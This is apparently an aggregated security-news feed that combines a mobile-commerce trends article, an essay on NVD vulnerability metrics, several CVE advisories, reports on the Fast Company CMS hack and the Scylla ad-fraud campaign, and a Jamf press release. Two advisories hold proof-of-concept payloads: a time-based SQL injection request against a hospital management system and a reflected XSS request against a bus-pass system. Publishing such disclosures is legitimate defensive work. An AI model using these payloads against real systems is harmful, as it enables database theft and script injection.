By Owais Sultan
Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need…
This is a post from HackRead.com Read the original post: Top 5 Mobile Commerce Trends in 2022

Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need for mobile app development and mobile commerce is growing daily. Mobile commerce may provide you with many options to succeed in the internet market if you are an online vendor.

However, there are currently a number of significant m-commerce competitors on the market, so it’s important to remain up to date on these developments if you want to stay ahead of the pack.

**What Exactly is M-commerce?**

Mobile commerce is the act of buying and selling products and services using portable electronics like smartphones and tablets. Mobile devices with shopping applications, social media channels, and online browsers are used for all commercial transactions.

Ecommerce development solely pertains to smartphones and tablets, to put it more precisely. It is simpler for a user to do mobile shopping thanks to the speed, ease, and creative route of a mobile application.

Additionally, by offering customers the greatest e-commerce app development services, mobile e-commerce apps or websites allow them access. Additionally, it enables consumers to shop and explore from anywhere.

**Trends in Mcommerce That are Effective for Interacting with Mobile Users**

**Using Mobile Applications to Shop**

According to Google, over the last two years, digital innovation in the retail industry has grown quickly, with the percentage of channel-agnostic shoppers rising from 65% to 73%. Lockdown limitations implemented globally have resulted in a 20% increase in time spent within mobile applications for retail apps. Many businesses then relocated the services their applications provided.

In this technologically evolved world, mobile apps are becoming a far more major part of the channel mix for retailers, so it’s important to understand how they may help you serve your customers in new ways and expand your company. especially at a time of social distance and unpredictability.

**Cryptocurrency Payments**

In 2024, it is anticipated that the cryptocurrency market would be worth $1.40 billion. Instantaneous digital payments are simplified and extremely secure because of crypto’s enhancements to portability and interoperability with QR codes.

With the help of cryptocurrency payments, firms can easily accept numerous currencies on mobile retail applications throughout the globe in a safe, personalized wallet. When making purchases through a mobile retail app, customers use rapid, secure mobile wallets like Apple Pay or Android Pay.

**High Mobile Phone Sales Volumes**

In 2022, smartphones and mobile shopping will unquestionably rule the eCommerce industry. Not all surfing is done on mobile websites and applications. Additionally, they are making purchases on their phones. A mobile app often generates sales worth $102 on average, compared to $92 for mobile websites.

iPads and tablets may also be used to access these applications and websites. However, starting in 2019, these gadgets’ sales have been declining. Depending on the device they are using, you may select how to communicate your marketing messaging to them. 

**Simple Ordering**

Numerous major firms are already working in this area to take advantage of the growing possibility in the m-commerce market as mobile commerce gains popularity. It is essential to provide your consumers with a better user experience and a smooth checkout procedure if you want to remain ahead of the competition.

Modern consumers want simple, fast methods of buying. Every time they wish to make a purchase, forcing your consumers to manually input all of their information may cause them to exit the basket. 

Shopping cart abandonment rates on mobile websites are higher because mobile applications often provide a better checkout experience than mobile websites.

**Virtual Reality and Augmented Reality**

Online consumers may digitally “try on” or “experience” the things they are interested in purchasing with the use of augmented reality, which is an excellent use of technology.

AR dramatically changes how you browse, and as a result, many businesses today, like IKEA, Gucci, and others, heavily rely on Augmented Reality (AR) technology to provide amusement and inspiration. The integration of online and offline shopping experiences is made possible by virtual reality, which improves the buying experience for the consumer.

**Conclusion**

For the foreseeable future, mobile trends will continue to greatly impact the e-commerce sector. You must maintain a close watch on mobile commerce developments as an owner of an e-commerce shop in order to make the necessary plans.

Making a mobile app for your e-commerce website is the simplest method to stay current with new technology and the times. In 2022, customers will choose to buy in this manner.

1.  How Traffic Analysis Boosts Ecommerce Profits
2.  How Technology Can Help Your Business Succeed
3.  Top Data-Driven Methods for Improving Your Investment Decisions
4.  Development of Corporate Applications Based on Artificial Intelligence
5.  Recent Mobile Payment Trends And How They Are Shaping The Future

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Top 5 Mobile Commerce Trends in 2022

Reports to the National Vulnerability Database jumped in 2022, but we should pay just as much attention to the flaws that are not being reported to NVD, including those affecting the software supply chain.

"You can't improve what you don't measure" is an oft-cited bit of wisdom frequently attributed to the famous management consultant Peter Drucker.

It's hard to dismiss the core truth of the saying, even if — for the record — he didn't say it, according to the Drucker Institute. After all, metrics from quarterly sales to individual KPIs are the basis for compensation, promotions, and more in 21st century organizations. There is also abundant evidence — from B.F. Skinner, for one — that humans quickly tailor their behaviors to how they're measured and incentivized.

The question that goes unasked is whether the right things are being measured, or whether the measurements in question are complete enough that they don't distort the perceptions (and decisions) of those doing the measuring. Those kinds of inconvenient questions informed research sponsored by ReversingLabs, the firm I co-founded, that analyzed six months of reports to the National Vulnerability Database (NVD) maintained by the National Institute of Standards and Technology (NIST).

**2022: A Banner Year for CVEs**

Our analysis found that vulnerability reports of new Common Vulnerabilities and Exposures (CVEs) to the NVD are accelerating, with 2022 on track to be the biggest year ever for new vulnerability reports. If the current trend holds, there will be more than 24,500 reports by year's end. That would mark a 22% increase over 2021, which was also a record-breaking year.

Those numbers seem to suggest that software security is deteriorating and that more forceful interventions by the public and private sector are needed to shore up software security. But there's a lot that's missed in that quick take. In its two decades of existence, the NVD has seen inconsistent growth in the number of reported vulnerabilities and exposures. Before 2005, the annual number of vulnerabilities assigned a CVE identifier never exceeded 2,500. For more than a decade after that, disclosed issues fluctuated between 4,000 and 8,000 reports per year.

The number of new CVEs in those years reflected the limited capacity of the CVE team at the nonprofit corporation MITRE, which was charged with taking in and documenting new CVE reports. We know that, because once MITRE began inviting more organizations to report vulnerabilities as CVE Number Authorities (CNAs) in 2016, the number of vulnerabilities surged. It doubled in 2017, and each year since has surpassed the previous year's record of reported CVEs.

The message: Considering a metric like the number of new CVEs is a mostly meaningless exercise if you're trying to assess the overall state of software security. More contributing firms will result in more CVEs. Fewer contributing firms will produce a drop in CVEs. The overall trend line is meaningless — at least so long as participation in the CVE program and submissions to the NVD by software vendors are voluntary.

**Software Supply Chain Security: Unmeasured and Unimproved**

As to the question of whether the right things are being measured? Here again, the current configuration of the NVD is misleading and heavily skewed toward the "usual suspects." Linux distributions Fedora and Debian accounted for 1,123 and 958 vulnerabilities, respectively, in the first half of 2022 and rank first and third on the list of software firms affected by reported issues, our research revealed. Google, Microsoft, Oracle, and Apple accounted for more than 500 vulnerabilities each.

The NVD has far less to say about flaws in popular open source platforms that are getting attention from sophisticated cyber actors. For example, our research shows that attacks on the popular software package repositories NPM and Python Package Index (PyPI) spiked 289% in the past few years, to 1,010 in 2021 from 259 in 2018. But only 56 CVEs referencing PyPI are in the NVD. PyPi's owner, the Python Software Foundation, is not a CNA. Other popular development and CI/CD platforms like CodeCov, CircleCI, and Bamboo are likewise not CNAs.

**Uncomfortable Question: Can We Trust Code?**

What does this disconnect mean for the future of public resources like the NVD? Change, for one thing. Recent events — such as the hijacking of the popular ua-parser-js project by a cryptominer — show that even seemingly secure projects can be compromised.

The lesson from incidents like this is that software security teams need to expand their focus beyond vulnerability scanning and even source code analysis to look at what code is doing. As long as we ignore this core question — can we trust code? — we are not addressing software supply chain security.

NIST and the federal government are also slowly pushing forward to implement the White House's year-old executive order on improving the nation's cybersecurity, which requires all federal government contractors and software providers to create a software bill of materials (SBOM) that can be reviewed. Recently released practice guidelines from the NSA, CISA, and ODNI further spell out steps organizations can take to secure software supply chains.

To keep pace with these larger changes, however, the NVD also needs to evolve. At the very least, its scope should expand to consistently include software supply chain exposures. Only then will the NVD move closer to representing the full breadth of threats facing modern organizations.

With the Software Supply Chain, You Can't Secure What You Don't Measure

hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.

Hi

I found a SQL injection vulnerability in your hospital management system.

**Page Request:-**

    POST /hospital/hms-staff.php HTTP/1.1
    Host: 192.168.0.107
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
    Connection: close
    
    email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
    

**The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP  tool.**

**Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter:  type****Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-****Mitigation:**

*   Performing Whitelist Input Validation
*   Use of Prepared Statements (with Parameterized Queries)

CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

CVE-2022-40407: Security issues - Chamilo LMS

Categories: Cybercrime
Categories: News
The US business magazine appeared to have two separate and related incidents in which it was compromised.



(Read more...)




The post Fast Company hacked to send obscene and racist messages appeared first on Malwarebytes Labs.

Yesterday, Apple News announced it had disabled the channel of Fast Company, a US-based business magazine, after surprised Twitter users reported it was tweeting offensive comments.

> An incredibly offensive alert was sent by Fast Company, which has been hacked. Apple News has disabled their channel.
> 
> — Apple News (@AppleNews) September 28, 2022

Fast Company was hacked on Sunday, September 25. The attacker responsible modified article titles to obscene and racist things:

"Hacked by Vinny Troia. \[redacted\] tongue my \[redacted\]", one title read.

  
This is what Fast Company looked like after it was hacked by an actor named "Thrax."

Fast Company took its site offline to fix the defacement but the hacker successfully got in again on Tuesday via content management system WordPress, in order to push the same offensive text to its followers on Apple News.

Fast Company tweeted on Wednesday:

> Fast Company's Apple News account was hacked on Tuesday evening. Two obscene and racist push notifications were sent about a minute apart.
> 
> The messages are vile and not in line with the content and ethos of Fast Company. (continued below)
> 
> — Fast Company (@FastCompany) September 28, 2022

On Thursday, Fast Company's website was displaying a statement regarding the hack on a black background.

  
"The messages are vile and are not in line with the content and ethos of Fast Company."

While the company is working to resolve what happened, it said it will continue publishing stories on its social channels, including Facebook, LinkedIn, and TikTok.

Speaking with BleepingComputer, "Thrax" revealed how they hacked Fast Company's website.

Thrax claimed they infiltrated Fast Company after bypassing basic HTTP authentication that secured the WordPress instance the company uses for their website. They then used a default password in "dozens" of accounts to take control of the CMS.

They then stole Auth0 tokens, Apple News API keys, and Amazon SES secrets. Using the tokens, "Thrax" says they created admin accounts on the CMS systems, which were then used to push out the notifications to Apple News.

Fast Company hacked to send obscene and racist messages

IBM Rational Change 5.3 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the SUPP_TEMPLATE_FLAG parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

CVE-2012-2160: Fix List for Rational Change

The company's website remains offline after hackers used its compromised CMS to send out racist messages.

Fast Company, the business-news publication, has taken its website offline after cyberattackers compromised its content management system (CMS). They used the access to send out two obscene and racist push notifications to its Apple News subscribers.

The incident follows a similar defacement attack on the FastCompany.com homepage on Sunday, where the attackers posted similar language. The outlet replaced its website with a statement overnight on Tuesday, which remains in place at press time.

"The messages are vile and are not in line with the content and ethos of Fast Company," the company said in the notice. "Fast Company regrets that such abhorrent language appeared on our platforms and in Apple News, and we apologize to anyone who saw it before it was taken down."

The company is investigating the situation and working to clean the site, it said. While no details of the attack are yet available, James McQuiggan, security awareness advocate at KnowBe4, noted that the goal was clearly brand assassination, perhaps with a side of flexing.

"While cybercriminals always go for the money, from time to time, they like to demonstrate their boldness by showing they have access to sensitive or publicly viewable systems by posting something outside of the normal scope of information shared," he said in an emailed statement.

**Highlighting the Need for Better Security**

Christopher Budd, senior manager of threat research at Sophos, tells Dark Reading that this is just latest example of an attack against PR and news infrastructure to deliver false information, with another recent example being a fake press release claiming Walmart was to begin accepting bitcoin.

The attack "highlights the fragility of PR and news infrastructure, and showcases how attacks like these could potentially be carried out for more malicious purposes that result in more dire consequences," he says. "Ultimately, this attack shows how news channels form a critical information infrastructure, and that this infrastructure should be secured in ways that match its criticality."

On a broader level, Jason Kent, hacker in residence at Cequence Security, suspects a credential-stuffing attack could be in play, indicating that the "credentials weren't terribly sophisticated and not backed up by multifactor auth or VPN requirements," he says.

"Credential-stuffing attacks are some of the most pervasive attacks we see on a daily basis," he adds. "Attackers attempt to guess passwords for valid accounts, and if they are successful the attacker will utilize the full permission of those credentials. Privileged access should be closely monitored as once the attacker has those, they will perform all manner of havoc."

Fast Company CMS Hack Raises Security Questions

By Waqas
Before being removed, the Scylla ad fraud campaign used over 90 malicious apps to carry out its operation against Android and iOS users.
This is a post from HackRead.com Read the original post: Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

The Satori Threat Intelligence and Research Team at Human identified a new wave of cyberattacks involving the use of malicious applications against iOS and Android users. The alarming fact is that these infected apps boast millions of downloads.

The good news is that the attack has been halted by Apple and Google after their prompt response to the researchers.

**Malicious Apps Found on Legitimate Platforms**

Reportedly, 89 malicious apps were discovered and used in a mobile fraud ad campaign. The apps collectively boasted around 13 million downloads. The researchers have dubbed this campaign Scylla.

Per their research, this campaign is the third installment of the Poseidon fraud campaign discovered in 2019, and its second installment was named Charybdis, which was detected in 2020.

You may be wondering where have you heard the term Scylla and Charybdis before. “Being between Scylla and Charybdis” is an idiom deriving from Greek mythology, which has been associated with the proverbial advice “to choose the lesser of two evils”.

In Greek mythology, Scylla and Charybdis were two monsters who lived on either side of a narrow channel of water. Scylla was a six-headed monster (_also featured in the TV series Prison Break_) who lived on a rock in the middle of the channel. Charybdis was a whirlpool who lived on the other side of the channel.

As for the malicious campaign, out of these 89 apps, 89 are Android, and 9 are iOS-based apps. The malicious apps perform ad fraud via hidden apps, spoofing, and fake clicks. What makes Scylla different from the earlier two mobile fraud campaigns is that this time the attackers have found a way to target iOS devices too.

**More Android Malware News**

1.  New malware targeting IoT devices, Android TV globally
2.  LG Smart TV Screen Bricked in Android Ransomware Attack
3.  Top 10 Android Educational Apps That Collect Most User Data?
4.  Fake Banking Rewards Apps Install Malware on Android Phones
5.  Hacked Android phones mimicked TV products for fake ad views

**Campaign Analysis**

According to the company’s blog post, just like the Charybdis campaign, the apps used in Scylla also contained obfuscated code. The attack mechanism is also somewhat the same as the apps target advertising software development kits/SDKs.

One of the iOS apps called “Wood Sculptor,” linked to the Scylla ad fraud campaign (Source: Satori Threat Intelligence and Research Team)

It is worth noting that some apps contained code that posed as completely different when observed by advertisers and ad tech firms.

> “These tactics, combined with the obfuscation techniques first observed in the Charybdis operation, demonstrate the increased sophistication of the threat actors behind Scylla.”
> 
> Satori Threat Intelligence and Research Team

**Application Detailed Overview**

Human researchers detected 29 Android apps posed as more than six thousand CTV-based apps to encourage higher ad proceeds than mobile games. Conversely, some apps contained code that informed advertisers of the ads they displayed to the user.

This means the code rendered ads after the apps were closed, such as when the home screen was on. Some apps captured the information about what ads the user clicked on and transferred the info to advertisers as a fake click. Most of the malicious apps were games.

Google and Apple were promptly informed about malicious apps’ presence and quickly removed from their respective platforms. Advertising SDK developers were also informed about the attack.

Human also published a list of malicious apps and urged users to remove them if installed on their devices. To remove these apps, just tap and hold the App and tap on the Remove option. Then tap on Delete App.

**More iOS Malware News**

1.  SolarWinds hackers exploited iOS 0-day to hack iPhones
2.  Malicious SDK spying, defrauding users through iOS apps
3.  Facebook removes accounts for iOS, and Android malware
4.  Fake Covid-19 apps hit Android and iOS users with spyware
5.  Install Malware on iPhone When it is Powered Off – Research

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

ZecOps extends Jamf's mobile security capabilities by adding advanced detections and incident response.

**MINNEAPOLIS, Sept. 26, 2022 (GLOBE NEWSWIRE) —** Jamf (NASDAQ: JAMF), the standard in Apple Enterprise Management, today announced it signed a definitive agreement to acquire ZecOps Inc., a leader in mobile detection and response.

This acquisition uniquely positions Jamf to help IT and security teams strengthen their organization's mobile security posture, accelerating mobile security investigations from weeks to minutes, leverage known indicators of compromise (IOC) at-scale, and identify sophisticated 0- or 1-click attacks on a much deeper scale.

"I am very excited to bring ZecOps' market-leading advanced mobile detection and response capabilities into the Jamf platform," said Dean Hager, CEO, Jamf. "We believe ZecOps has built a differentiated solution that meets a very important need for many organizations — the ability to thoroughly detect and investigate threats that target mobile users so they can confidently use these powerful devices for work. This capability further propels our goal of continuing to bridge the gap between what Apple provides and the enterprise requires."

Mobile devices now account for 59% of global website traffic, and according to the 2022 Verizon Mobile Security Index, close to half (45%) of companies said that they have suffered a compromise involving a mobile device in the past 12 months.

ZecOps will bring important capabilities to the Jamf platform to help address the growing trend of targeted mobile attacks. Jamf offers robust management and mobile security capabilities for iOS devices; however, access to deeper insights into potential security exploits is technically challenging and requires physical access to the device, which is difficult in a remote work environment. ZecOps is a robust, unparalleled solution that provides the deepest layer of insight and assurance for security-conscious customers with high-value targets that need something more. ZecOps provides the same level of visibility currently available for macOS through Jamf Protect but for iOS, making it capable of detecting the kinds of sophisticated mobile threats that Apple's Lockdown mode aims to prevent. With ZecOps, users can have both Lockdown mode and ZecOps software operating at the same time.

**Advanced threat hunting on mobile devices**  
Advanced protection of mobile devices requires a layered approach. Proactive investigation and analysis complement device management and mobile threat defense for more advanced detections and preventative protections. ZecOps enables advanced threat hunting by capturing and analyzing logs from iOS and Android devices at the operating system layer, allowing security operations and incident response teams to perform automatic or on-demand mobile cyber investigations.

**Digital forensics and incident response**  
Security teams are already drowning in data. Event logs, analyst reports, third-party threat intelligence feeds, and more are produced regularly for applications, endpoints, and network infrastructure. Mobile has historically been left out of this data feed. Many investigation teams lack expertise in modern mobile platforms. ZecOps' sophisticated digital forensics capabilities provides Security Operation Center (SOC) teams with unique mobile threat intelligence to uncover zero-day attacks. ZecOps does the heavy lifting for SOC teams, saving months of work per investigation. The solution automatically constructs a timeline of suspicious events and indicators of compromise to demonstrate when and how a device was impacted.

**Privacy conscious**  
Data privacy is extremely important to Jamf. ZecOps shares Jamf's commitment to safeguarding user data by ensuring log collection doesn't include the user's material personal data such as photos, videos, text messages and call logs, and only leveraging low-level system information and diagnostics data to the cloud for analysis. ZecOps analysis can also take place on-premises to meet various organizations' and governments data privacy requirements.

"We founded ZecOps to catch hidden 0-click and 1-click attacks," said Zuk Avraham, co-founder and CEO, ZecOps. "By combining with Jamf, we can offer our customers a truly powerful mobile threat intelligence and threat hunting capabilities that will keep up with the evolving threat landscape without compromising the user experience."

This transaction is subject to the satisfaction of customary closing conditions and is expected to close in the fourth quarter. Terms of the transaction were not disclosed.

**About Jamf**  
Jamf's purpose is to simplify work by helping organizations manage and secure an Apple experience that end users love and organizations trust. Jamf is the only company in the world that provides a complete management and security solution for an Apple-first environment that is enterprise secure, consumer simple and protects personal privacy. To learn more, visit www.jamf.com.

**About ZecOps**  
ZecOps develops the world's most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading enterprises, governments and individuals globally, ZecOps Mobile Detection and Response platform provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes.

**Forward-Looking Statements**  
This release relates to a pending acquisition of ZecOps, Inc. ("ZecOps") by Jamf Holding Corp. ("Jamf", "we", our" or "us"). This release contains forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995, regarding the anticipated benefits of the acquisition, and the anticipated impacts of the acquisition on our business, products, financial results, and other aspects of our and ZecOps' operations. You can identify forward-looking statements by the fact that they do not relate strictly to historical or current facts. These statements may include words such as "anticipate," "estimate," "expect," "project," "plan," "intend," "believe," "may," "will," "should," "can have," "likely," and other words and terms of similar meaning in connection with any discussion of the timing or nature of future operating or financial performance or other events. These risks, uncertainties, assumptions, and other factors include, but are not limited to: the effect of the announcement of the acquisition on the ability of Jamf or ZecOps to retain key personnel or maintain relationships with customers, vendors, developers, community members, and other business partners; risks that the acquisition disrupts current plans and operations; the ability of the parties to consummate the acquisition on a timely basis or at all; the satisfaction of the conditions precedent to consummation of the acquisition; our ability to successfully integrate ZecOps' operations; our and ZecOps' ability to execute on our business strategies relating to the acquisition and realize expected benefits and synergies; and our ability to compete effectively, including in response to actions our competitors may take following announcement of the acquisition. Further information on these and additional risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this release are included under the caption "Forward-Looking Statements" and elsewhere in our Form 10-Q for the quarter ended June 30, 2022, and other filings and reports we make with the Securities and Exchange Commission from time to time. Moreover, both we and ZecOps operate in a very competitive and rapidly changing environment, and new risks may emerge from time to time. It is not possible for us to predict all risks, nor can we assess the impact of all factors on our business or the acquisition, or the extent to which any factor, or combination of factors, may cause actual results or outcomes to differ materially from those contained in any forward-looking statements we may make. Forward-looking statements speak only as of the date the statements are made and are based on information available to us at the time those statements are made and/or our management's good faith belief as of that time with respect to future events. Except as required by law, we undertake no obligation, and do not intend, to update these forward-looking statements.

SOURCE: Jamf

Tag

#apple